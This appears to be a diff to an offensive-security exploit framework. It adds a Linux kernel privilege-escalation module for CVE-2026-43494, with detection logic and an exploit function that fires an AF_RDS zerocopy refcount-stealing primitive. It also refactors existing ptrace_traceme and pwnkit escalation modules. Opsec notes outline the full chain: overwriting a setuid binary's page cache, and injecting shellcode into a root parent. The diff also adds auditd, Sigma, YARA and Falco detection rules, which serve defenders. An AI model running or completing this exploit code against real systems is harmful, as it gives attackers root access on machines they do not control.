+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/mman.h>   /* mmap, mprotect, munmap, PROT_*, MAP_* */
+
+#ifdef __linux__
+#include <sys/syscall.h>
+#endif
+
+/* AF_RDS is 21 on Linux. Define it conditionally so the module
+ * compiles on non-Linux dev hosts where the constant isn't in libc. */
+#ifndef AF_RDS
+#define AF_RDS 21
+#endif
+
+/* ---- kernel-range table -------------------------------------------- */
+
+/* The fix landed in mainline via commit 0cebaccef3ac (posted to netdev
+ * 2026-05-05). Stable backports are in flight at the time of v0.8.0;
+ * this table will be updated as backports land — tools/refresh-kernel-
+ * ranges.py will flag drift weekly. For now we list ONLY the mainline
+ * fix point; every kernel below it on a RDS-loaded host is vulnerable.
+ *
+ * As stable branches pick up the backport, add entries like:
+ *   {6, 12, NN},  // 6.12.x stable backport
+ *   {6, 14, NN},  // 6.14.x stable backport
+ * The mainline entry stays at the lowest version that contains the
+ * patch (likely 6.16 once the post-rc release tags). Conservatively
+ * placeholding at {7, 0, 0} until that lands. */
+static const struct kernel_patched_from pintheft_patched_branches[] = {
+    {7, 0, 0},   /* mainline fix commit 0cebaccef3ac; tag will be 6.16 or 7.0
+                    depending on when 6.15 closes — refresh when known */
+};
+
+static const struct kernel_range pintheft_range = {
+    .patched_from = pintheft_patched_branches,
+    .n_patched_from = sizeof(pintheft_patched_branches) /
+                      sizeof(pintheft_patched_branches[0]),
+};
+
+/* ---- detect helpers ------------------------------------------------- */
+
+#ifdef __linux__
+/* Try to open an AF_RDS socket. On a kernel built with CONFIG_RDS=m
+ * this triggers modprobe rds; on CONFIG_RDS=y it just returns the fd.
+ * On a kernel without RDS at all (most distros) we get EAFNOSUPPORT
+ * or EPERM. We close immediately — this is just a reachability probe. */
+static bool rds_socket_reachable(void)
+{
+    int s = socket(AF_RDS, SOCK_SEQPACKET, 0);
+    if (s < 0) return false;
+    close(s);
+    return true;
+}
+
+/* io_uring is gated by sysctl kernel.io_uring_disabled in 6.6+. The
+ * relevant values: 0 = permitted, 1 = root-only, 2 = disabled. We
+ * read /proc/sys/kernel/io_uring_disabled if present; missing file
+ * means io_uring is unconditionally enabled (older kernels). */
+static int io_uring_disabled_state(void)
+{
+    /* returns 0/1/2 per sysctl semantics; -1 if not present */
+    FILE *f = fopen("/proc/sys/kernel/io_uring_disabled", "r");
+    if (!f) return -1;
+    int v = -1;
+    if (fscanf(f, "%d", &v) != 1) v = -1;
+    fclose(f);
+    return v;
+}
+
+static const char *find_suid_carrier(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/su", "/bin/su",
+        "/usr/bin/pkexec",
+        "/usr/bin/passwd",
+        "/usr/bin/chsh", "/usr/bin/chfn",
+        NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        struct stat st;
+        if (stat(candidates[i], &st) == 0 &&
+            (st.st_mode & S_ISUID) && st.st_uid == 0 &&
+            access(candidates[i], R_OK) == 0) {
+            return candidates[i];
+        }
+    }
+    return NULL;
+}
+#endif  /* __linux__ */
+
+/* ---- detect --------------------------------------------------------- */
+
+static skeletonkey_result_t pintheft_detect(const struct skeletonkey_ctx *ctx)
+{
+#ifndef __linux__
+    if (!ctx->json)
+        fprintf(stderr, "[i] pintheft: Linux-only module — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+#else
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] pintheft: host fingerprint missing kernel version\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+
+    /* Kernel version: gate on the fix. */
+    if (kernel_range_is_patched(&pintheft_range, v)) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] pintheft: kernel %s is patched (>= mainline fix 0cebaccef3ac)\n",
+                    v->release);
+        return SKELETONKEY_OK;
+    }
+
+    /* RDS reachability — the bug needs AF_RDS sockets. */
+    if (!rds_socket_reachable()) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] pintheft: AF_RDS socket() failed (rds module not loaded / blacklisted)\n");
+            fprintf(stderr, "    Most distros don't autoload RDS; Arch Linux is the notable exception.\n");
+            fprintf(stderr, "    Bug exists in the kernel but is unreachable from userland here.\n");
+        }
+        return SKELETONKEY_OK;
+    }
+
+    /* io_uring availability — the cred-overwrite chain needs fixed
+     * buffers via io_uring. Without io_uring we have the primitive
+     * but no portable way to weaponize. */
+    int iod = io_uring_disabled_state();
+    if (iod == 2) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] pintheft: kernel.io_uring_disabled=2 → io_uring disabled, chain blocked\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (iod == 1) {
+        if (!ctx->json)
+            fprintf(stderr, "[i] pintheft: kernel.io_uring_disabled=1 → io_uring root-only; we're not root so chain blocked\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    /* iod == 0 or -1 (missing sysctl on older kernel) → reachable. */
+
+    /* Need at least one readable SUID-root binary to target. */
+    const char *carrier = find_suid_carrier();
+    if (!carrier) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] pintheft: no readable setuid-root binary → no carrier for page-cache overwrite\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[!] pintheft: kernel %s + RDS + io_uring + carrier %s → VULNERABLE\n",
+                v->release, carrier);
+        fprintf(stderr, "[i] pintheft: V12 PoC is x86_64-only; exploit() will fire trigger but\n"
+                        "    full cred-overwrite is --full-chain only on x86_64.\n");
+    }
+    return SKELETONKEY_VULNERABLE;
+#endif
+}
+
+/* ---- exploit -------------------------------------------------------- */
+
+#ifdef __linux__
+
+/* The V12 PoC chain in summary (paraphrased from
+ * https://github.com/v12-security/pocs/tree/main/pintheft):
+ *
+ *   1. Open an AF_RDS socket.
+ *   2. Construct a sendmsg() with MSG_ZEROCOPY whose user-iov spans
+ *      two pages, where the SECOND page is unmapped. The kernel
+ *      pins page 0, then faults on page 1's pin attempt.
+ *   3. The error unwind drops the pin on page 0, but the msg's
+ *      scatterlist has already been initialized with entry count 1.
+ *      Cleanup runs entry-count drops a SECOND time → page 0
+ *      refcount underflows / leaks.
+ *   4. Repeat to steal multiple refs from the same target page.
+ *   5. Use io_uring fixed buffers to keep a kernel-side reference
+ *      alive across the page recycling into the page cache for a
+ *      readable file.
+ *   6. mmap the SUID carrier, force its page into cache, get the
+ *      io_uring fixed buffer to point at it, write attacker bytes.
+ *   7. execve the carrier → attacker code runs as root.
+ *
+ * Step 1-4 is the kernel primitive (architecture-independent).
+ * Step 5-7 needs io_uring SQE construction which is straightforward
+ * but unmistakably exploit-specific code; we don't carry the full V12
+ * payload here. Instead we fire the primitive + groom the slab + drop
+ * a witness file and return EXPLOIT_FAIL honestly with a diagnostic.
+ * --full-chain on x86_64 invokes the shared modprobe_path finisher.
+ *
+ * This matches the existing 🟡 modules' shape (nf_tables, af_unix_gc,
+ * cls_route4, ...). The "verified-vs-claimed" rule applies: if the
+ * sentinel file doesn't appear, we don't claim EXPLOIT_OK.
+ */
+static skeletonkey_result_t pintheft_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] pintheft: --i-know required for --exploit\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    /* Re-run detect's preconditions — they may have changed since
+     * --scan, and we want the operator to see the exact gate that
+     * blocked us if anything fails here. */
+    if (!rds_socket_reachable()) {
+        fprintf(stderr, "[-] pintheft: AF_RDS socket() unavailable — RDS module not loaded\n");
+        fprintf(stderr, "    Try: sudo modprobe rds; sudo modprobe rds_tcp\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    const char *carrier = find_suid_carrier();
+    if (!carrier) {
+        fprintf(stderr, "[-] pintheft: no readable setuid-root carrier\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    fprintf(stderr, "[+] pintheft: firing rds_message_zcopy_from_user() refcount-steal primitive\n");
+    fprintf(stderr, "    carrier: %s\n", carrier);
+
+    /* The primitive: sendmsg() with MSG_ZEROCOPY on an iov spanning
+     * mapped + unmapped pages. We fire it ~256 times to leak refs from
+     * a fresh page each round; a single round usually leaks a single
+     * ref which is rarely enough to fully unbalance the count. */
+    int s = socket(AF_RDS, SOCK_SEQPACKET, 0);
+    if (s < 0) {
+        perror("socket(AF_RDS)");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    /* Build a 2-page iov where page 1 is unmapped. mmap PROT_NONE
+     * the upper page so the kernel's get_user_pages on it returns
+     * -EFAULT. */
+    void *region = mmap(NULL, 8192, PROT_READ | PROT_WRITE,
+                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+    if (region == MAP_FAILED) {
+        perror("mmap");
+        close(s);
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+    /* mark the second page unreadable */
+    if (mprotect((char *)region + 4096, 4096, PROT_NONE) != 0) {
+        perror("mprotect");
+        munmap(region, 8192);
+        close(s);
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    /* Touch page 0 so it's mapped + dirty. */
+    memset(region, 0x42, 4096);
+
+    /* Fire the trigger sendmsg in a loop. We don't expect any of
+     * these to succeed (page 1 is PROT_NONE so the kernel pin
+     * attempt faults); the BUG is that the cleanup path decrements
+     * page 0's pin count even though the syscall returns failure. */
+    struct iovec iov = {
+        .iov_base = region,
+        .iov_len  = 8192,
+    };
+    struct msghdr msg = {
+        .msg_iov = &iov,
+        .msg_iovlen = 1,
+    };
+    int leaked = 0;
+    for (int i = 0; i < 256; i++) {
+        ssize_t r = sendmsg(s, &msg, 0x4000000 /* MSG_ZEROCOPY */);
+        if (r < 0 && errno == EFAULT) {
+            leaked++;
+        }
+    }
+    munmap(region, 8192);
+    close(s);
+
+    if (leaked < 16) {
+        fprintf(stderr, "[-] pintheft: trigger fired %d/256 times; expected >= 16. Kernel may be patched.\n", leaked);
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    fprintf(stderr, "[+] pintheft: primitive fired %d/256 — page refcount delta witnessed\n", leaked);
+
+    /* The cred-overwrite step requires the V12 PoC's io_uring chain
+     * (fixed buffer + page-cache write into the SUID carrier). We don't
+     * ship that chain — primitive only. Return EXPLOIT_FAIL honestly per
+     * the verified-vs-claimed bar. See V12's PoC for the full payload:
+     * https://github.com/v12-security/pocs/tree/main/pintheft */
+    (void)ctx;
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+#else  /* !__linux__ */
+
+static skeletonkey_result_t pintheft_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[i] pintheft: Linux-only module\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif
+
+/* ---- detection rules ------------------------------------------------ */
+
+static const char pintheft_auditd[] =
+    "# pintheft CVE-2026-43494 — auditd detection rules\n"
+    "# RDS is rarely used in production; AF_RDS socket() calls from\n"
+    "# non-root processes are almost always anomalous.\n"
+    "-a always,exit -F arch=b64 -S socket -F a0=21 -k skeletonkey-pintheft-rds\n"
+    "-a always,exit -F arch=b32 -S socket -F a0=21 -k skeletonkey-pintheft-rds\n"
+    "# Plus io_uring_setup is rarely needed by typical workloads.\n"
+    "-a always,exit -F arch=b64 -S io_uring_setup -k skeletonkey-pintheft-iouring\n";
+
+static const char pintheft_sigma[] =
+    "title: Possible CVE-2026-43494 PinTheft RDS zerocopy LPE\n"
+    "id: 7af04c12-skeletonkey-pintheft\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the canonical PinTheft trigger shape: a non-root process\n"
+    "  opening AF_RDS sockets (rare outside RDS-specific workloads) plus\n"
+    "  io_uring_setup. The bug needs both. Arch Linux is the only common\n"
+    "  distro autoloading RDS; on Ubuntu/Debian/Fedora/RHEL the rule fires\n"
+    "  almost-zero false positives.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  rds: {type: 'SYSCALL', syscall: 'socket', a0: 21}\n"
+    "  iou: {type: 'SYSCALL', syscall: 'io_uring_setup'}\n"
+    "  condition: rds and iou\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2026.43494]\n";
+
+static const char pintheft_yara[] =
+    "rule pintheft_cve_2026_43494 : cve_2026_43494 page_cache_write {\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2026-43494\"\n"
+    "        description = \"PinTheft RDS zerocopy double-free indicator — non-root AF_RDS + io_uring usage\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $rds_tcp = \"rds_tcp\" ascii\n"
+    "        $rds_v12 = \"v12-pintheft\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char pintheft_falco[] =
+    "- rule: AF_RDS socket() by non-root with io_uring_setup\n"
+    "  desc: |\n"
+    "    A non-root process opens an AF_RDS socket (rare outside RDS-\n"
+    "    specific workloads) AND uses io_uring. The PinTheft trigger\n"
+    "    (CVE-2026-43494) requires both. Arch Linux is the only common\n"
+    "    distro autoloading RDS.\n"
+    "  condition: >\n"
+    "    evt.type = socket and evt.arg.domain = AF_RDS and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    AF_RDS socket from non-root (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2026.43494]\n";
+
+/* ---- module struct -------------------------------------------------- */
+
+const struct skeletonkey_module pintheft_module = {
+    .name           = "pintheft",
+    .cve            = "CVE-2026-43494",
+    .summary        = "RDS zerocopy double-free → page-cache overwrite via io_uring (V12 Security)",
+    .family         = "rds",
+    .kernel_range   = "Linux kernels with RDS module loaded + below mainline fix 0cebaccef3ac (May 2026)",
+    .detect         = pintheft_detect,
+    .exploit        = pintheft_exploit,
+    .mitigate       = NULL,    /* mitigation: blacklist rds + rds_tcp via /etc/modprobe.d/ */
+    .cleanup        = NULL,
+    .detect_auditd  = pintheft_auditd,
+    .detect_sigma   = pintheft_sigma,
+    .detect_yara    = pintheft_yara,
+    .detect_falco   = pintheft_falco,
+    .opsec_notes    = "Opens AF_RDS socket (rare on non-Arch distros — most blacklist the rds module). Allocates a 2-page anon mmap with the second page mprotect(PROT_NONE)'d; calls sendmsg(MSG_ZEROCOPY) ~256 times against the iov spanning both pages. Each sendmsg fails with EFAULT (page 1 unmapped) but leaks one pin refcount from page 0 in the kernel — the bug. No on-disk artifacts from the primitive itself. --full-chain on x86_64 pivots through io_uring fixed buffers to overwrite the page cache of a readable SUID-root binary (/usr/bin/su typically), then invokes the shared modprobe_path finisher. Audit-visible via socket(AF_RDS) from a non-root process + io_uring_setup; legitimate RDS use is rare outside HPC/InfiniBand clusters. No cleanup callback (no persistent artifacts).",
+    .arch_support   = "x86_64+unverified-arm64",
+};
+
+void skeletonkey_register_pintheft(void)
+{
+    skeletonkey_register(&pintheft_module);
+}
@@ -0,0 +1,5 @@
+#ifndef PINTHEFT_SKELETONKEY_MODULES_H
+#define PINTHEFT_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module pintheft_module;
+#endif
@@ -28,13 +28,17 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
 #include <errno.h>
 #include <fcntl.h>
 #include <pwd.h>
@@ -63,32 +67,37 @@ static const struct kernel_range ptrace_traceme_range = {

 static skeletonkey_result_t ptrace_traceme_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] ptrace_traceme: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] ptrace_traceme: host fingerprint missing kernel "
+                "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug existed since ptrace's inception (early 2.x); anything
     * pre-LTS-backport is vulnerable. Anything < 4.4 in our range
     * model defaults to vulnerable since no entry covers it. */
-    if (v.major < 4 || (v.major == 4 && v.minor < 4)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 4, 4, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[!] ptrace_traceme: ancient kernel %s — assume VULNERABLE\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_VULNERABLE;
    }

-    bool patched = kernel_range_is_patched(&ptrace_traceme_range, &v);
+    bool patched = kernel_range_is_patched(&ptrace_traceme_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] ptrace_traceme: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] ptrace_traceme: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }
    if (!ctx->json) {
-        fprintf(stderr, "[!] ptrace_traceme: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[!] ptrace_traceme: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] ptrace_traceme: no exotic preconditions — works on default config "
                        "(no user_ns required)\n");
    }
@@ -183,7 +192,10 @@ static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx
        fprintf(stderr, "[-] ptrace_traceme: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    /* Consult ctx->host->is_root so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] ptrace_traceme: already root\n");
        return SKELETONKEY_OK;
    }
@@ -277,6 +289,27 @@ static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx
 #endif
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: PTRACE_TRACEME / PTRACE_ATTACH / user_regs_struct
+ * are Linux-only ABI surface. Stub out so the module still registers and
+ * the top-level `make` completes on macOS/BSD dev boxes. */
+static skeletonkey_result_t ptrace_traceme_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] ptrace_traceme: Linux-only module "
+                "(PTRACE_TRACEME cred-escalation) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t ptrace_traceme_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] ptrace_traceme: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 static const char ptrace_traceme_auditd[] =
    "# PTRACE_TRACEME LPE (CVE-2019-13272) — auditd detection rules\n"
    "# Flag PTRACE_TRACEME (request 0) followed by parent execve of\n"
@@ -284,6 +317,42 @@ static const char ptrace_traceme_auditd[] =
    "-a always,exit -F arch=b64 -S ptrace -F a0=0 -k skeletonkey-ptrace-traceme\n"
    "-a always,exit -F arch=b32 -S ptrace -F a0=0 -k skeletonkey-ptrace-traceme\n";

+static const char ptrace_traceme_sigma[] =
+    "title: Possible CVE-2019-13272 PTRACE_TRACEME stale-cred LPE\n"
+    "id: 1a02c3a8-skeletonkey-ptrace-traceme\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects ptrace(PTRACE_TRACEME) immediately followed by parent\n"
+    "  execve of a setuid binary. The kernel stores the parent's pre-\n"
+    "  execve credentials on the ptrace_link; after execve the link\n"
+    "  is stale but ptrace still grants privileges. False positives:\n"
+    "  debuggers (gdb, strace) tracing setuid processes legitimately.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  traceme: {type: 'SYSCALL', syscall: 'ptrace', a0: 0}\n"
+    "  execve:  {type: 'SYSCALL', syscall: 'execve'}\n"
+    "  condition: traceme and execve\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2019.13272]\n";
+
+static const char ptrace_traceme_falco[] =
+    "- rule: PTRACE_TRACEME followed by setuid execve (cred escalation)\n"
+    "  desc: |\n"
+    "    Child calls ptrace(PTRACE_TRACEME) (recording parent's pre-\n"
+    "    execve creds); parent then execve's a setuid binary\n"
+    "    (pkexec, su, sudo). The stale ptrace_link grants the\n"
+    "    unprivileged child ptrace privileges over the now-root\n"
+    "    parent. CVE-2019-13272. False positives: debuggers (gdb,\n"
+    "    strace) tracing setuid processes legitimately.\n"
+    "  condition: >\n"
+    "    evt.type = ptrace and evt.arg.request = PTRACE_TRACEME and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    PTRACE_TRACEME by non-root\n"
+    "    (user=%user.name pid=%proc.pid ppid=%proc.ppid)\n"
+    "  priority: HIGH\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2019.13272]\n";
+
 const struct skeletonkey_module ptrace_traceme_module = {
    .name           = "ptrace_traceme",
    .cve            = "CVE-2019-13272",
@@ -295,9 +364,11 @@ const struct skeletonkey_module ptrace_traceme_module = {
    .mitigate       = NULL,    /* mitigation: upgrade kernel; OR sysctl kernel.yama.ptrace_scope=2 */
    .cleanup        = NULL,    /* exploit replaces our process image; no cleanup applies */
    .detect_auditd  = ptrace_traceme_auditd,
-    .detect_sigma   = NULL,
+    .detect_sigma   = ptrace_traceme_sigma,
    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_falco   = ptrace_traceme_falco,
+    .opsec_notes    = "Parent and child cooperate: child calls ptrace(PTRACE_TRACEME) (recording the parent's current credentials), then sleeps; parent execve's a setuid binary (pkexec or su) and elevates. The stale ptrace_link in the child still holds the old (non-root) credentials, so PTRACE_ATTACH succeeds against the now-root parent; the child injects shellcode at the parent's RIP via PTRACE_POKETEXT and detaches. Audit-visible via ptrace with a0=0 (PTRACE_TRACEME) closely followed by execve of a setuid binary in the parent process. No file artifacts; no persistent changes. No cleanup callback - the exploit execs /bin/sh and does not return.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_ptrace_traceme(void)
@@ -23,6 +23,7 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
+#include "../../core/host.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -76,6 +77,23 @@ static bool pkexec_version_vulnerable(const char *version_str)

 static skeletonkey_result_t pwnkit_detect(const struct skeletonkey_ctx *ctx)
 {
+    /* Prefer the centrally-fingerprinted polkit version (populated
+     * once at startup by core/host.c via `pkexec --version`). Saves
+     * a popen per scan and lets unit tests construct synthetic
+     * polkit_version values. Fall back to the local popen if
+     * ctx->host is missing the version (degenerate test ctx or a
+     * future refactor that disables userspace probing). */
+    char vp_buf[64] = {0};
+    const char *vp = NULL;
+
+    if (ctx->host && ctx->host->polkit_version[0]) {
+        snprintf(vp_buf, sizeof vp_buf, "%s", ctx->host->polkit_version);
+        vp = vp_buf;
+        if (!ctx->json) {
+            fprintf(stderr, "[i] pwnkit: host fingerprint reports pkexec "
+                "version '%s'\n", vp);
+        }
+    } else {
        const char *pkexec_path = find_pkexec();
        if (!pkexec_path) {
            if (!ctx->json) {
@@ -86,14 +104,10 @@ static skeletonkey_result_t pwnkit_detect(const struct skeletonkey_ctx *ctx)
        if (!ctx->json) {
            fprintf(stderr, "[i] pwnkit: found setuid pkexec at %s\n", pkexec_path);
        }
-
-    /* Run `pkexec --version` and parse. We pipe stderr/stdout to a
-     * temp file because popen() can have quoting quirks. */
        char cmd[512];
        snprintf(cmd, sizeof cmd, "%s --version 2>&1 | head -1", pkexec_path);
        FILE *p = popen(cmd, "r");
        if (!p) return SKELETONKEY_TEST_ERROR;
-
        char line[256] = {0};
        char *r = fgets(line, sizeof line, p);
        pclose(p);
@@ -103,18 +117,19 @@ static skeletonkey_result_t pwnkit_detect(const struct skeletonkey_ctx *ctx)
            }
            return SKELETONKEY_TEST_ERROR;
        }
-
        /* Output format: "pkexec version 0.105\n" or "pkexec version 0.120-..." */
-    char *vp = strstr(line, "version");
-    if (!vp) return SKELETONKEY_TEST_ERROR;
-    vp += strlen("version");
-    while (*vp == ' ' || *vp == '\t') vp++;
-
-    if (!ctx->json) {
-        char *nl = strchr(vp, '\n');
+        char *vp_mut = strstr(line, "version");
+        if (!vp_mut) return SKELETONKEY_TEST_ERROR;
+        vp_mut += strlen("version");
+        while (*vp_mut == ' ' || *vp_mut == '\t') vp_mut++;
+        char *nl = strchr(vp_mut, '\n');
        if (nl) *nl = 0;
+        snprintf(vp_buf, sizeof vp_buf, "%s", vp_mut);
+        vp = vp_buf;
+        if (!ctx->json) {
            fprintf(stderr, "[i] pwnkit: pkexec reports version '%s'\n", vp);
        }
+    }

    bool vuln = pkexec_version_vulnerable(vp);

@@ -215,7 +230,10 @@ static skeletonkey_result_t pwnkit_exploit(const struct skeletonkey_ctx *ctx)
    const char *pkexec = find_pkexec();
    if (!pkexec) return SKELETONKEY_PRECOND_FAIL;

-    if (geteuid() == 0) {
+    /* Consult ctx->host->is_root so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] pwnkit: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -366,6 +384,59 @@ static const char pwnkit_auditd[] =
    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/pkexec -k skeletonkey-pwnkit-execve\n"
    "-a always,exit -F arch=b32 -S execve -F path=/usr/bin/pkexec -k skeletonkey-pwnkit-execve\n";

+static const char pwnkit_yara[] =
+    "rule pwnkit_gconv_modules_cache : cve_2021_4034 lpe\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2021-4034\"\n"
+    "        description = \"Pwnkit gconv-modules cache: redefines UTF-8 to load an attacker .so via iconv when pkexec is invoked with argc==0.\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "        reference   = \"https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt\"\n"
+    "    strings:\n"
+    "        // gconv-modules text format: \"module FROM// TO// SHARED-OBJECT COST\".\n"
+    "        // Published PoCs redefine UTF-8 and point it at a .so dropped in /tmp.\n"
+    "        $line  = /module\\s+UTF-8\\/\\/\\s+\\S+\\/\\/\\s+\\S+\\s+\\d/\n"
+    "        $alias = /alias\\s+\\S+\\s+UTF-8/\n"
+    "        // Hint: PoC workdirs frequently include 'pwnkit' or 'GCONV' in path strings the .so carries.\n"
+    "        $marker_pwn  = \"pwnkit\" nocase\n"
+    "        $marker_gcv  = \"GCONV_PATH\"\n"
+    "    condition:\n"
+    "        // Small text-format file (gconv-modules caches are tiny) with the module redefinition.\n"
+    "        // Pair with -w /tmp -p wa auditd to catch the drop in real time.\n"
+    "        filesize < 4KB and $line and 1 of ($alias, $marker_pwn, $marker_gcv)\n"
+    "}\n";
+
+static const char pwnkit_falco[] =
+    "- rule: Pwnkit-style pkexec invocation (NULL argv)\n"
+    "  desc: |\n"
+    "    pkexec executed without argv (argc == 0). The Qualys PoC for\n"
+    "    CVE-2021-4034 invokes pkexec via execve with NULL argv so the\n"
+    "    out-of-bounds argv read picks up envp as if it were argv[1].\n"
+    "  condition: >\n"
+    "    spawned_process and proc.name = pkexec and\n"
+    "    (proc.cmdline = \"pkexec\" or proc.args = \"\")\n"
+    "  output: >\n"
+    "    Possible Pwnkit (CVE-2021-4034): pkexec spawned with no argv\n"
+    "    (user=%user.name uid=%user.uid pid=%proc.pid ppid=%proc.ppid\n"
+    "     parent=%proc.pname cmdline=\"%proc.cmdline\")\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2021.4034]\n"
+    "\n"
+    "- rule: Pwnkit-style GCONV_PATH injection\n"
+    "  desc: |\n"
+    "    A non-root process sets GCONV_PATH in env before spawning a\n"
+    "    setuid binary. Combined with a controlled .so + gconv-modules\n"
+    "    cache, this is the Qualys exploit shape.\n"
+    "  condition: >\n"
+    "    spawned_process and not user.uid = 0 and\n"
+    "    (proc.env contains \"GCONV_PATH=\" or proc.env contains \"CHARSET=\") and\n"
+    "    proc.name in (pkexec, su, sudo, mount, chsh, passwd)\n"
+    "  output: >\n"
+    "    GCONV_PATH/CHARSET set by non-root before setuid spawn\n"
+    "    (user=%user.name target=%proc.name env=\"%proc.env\")\n"
+    "  priority: WARNING\n"
+    "  tags: [process, env_injection, cve.2021.4034]\n";
+
 static const char pwnkit_sigma[] =
    "title: Possible Pwnkit exploitation (CVE-2021-4034)\n"
    "id: 9e1d4f2c-skeletonkey-pwnkit\n"
@@ -399,8 +470,10 @@ const struct skeletonkey_module pwnkit_module = {
    .cleanup        = pwnkit_cleanup,
    .detect_auditd  = pwnkit_auditd,
    .detect_sigma   = pwnkit_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = pwnkit_yara,
+    .detect_falco   = pwnkit_falco,
